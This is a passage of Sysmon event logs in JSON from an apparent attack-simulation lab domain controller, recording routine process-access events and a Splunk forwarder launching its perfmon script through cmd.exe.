C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2211,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010DFEC0300}\r\nTargetProcessId: 2800\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010DFEC0300}","TargetProcessId":"2800","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2212,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.569\r\nProcessGuid: {E2A3D6B1-1070-5F25-0000-0010730A0400}\r\nProcessId: 2764\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.569","ProcessGuid":"{E2A3D6B1-1070-5F25-0000-0010730A0400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2213,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00101EEC0300}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00101EEC0300}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2214,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00101EEC0300}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00101EEC0300}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2215,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2216,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2217,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2218,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SY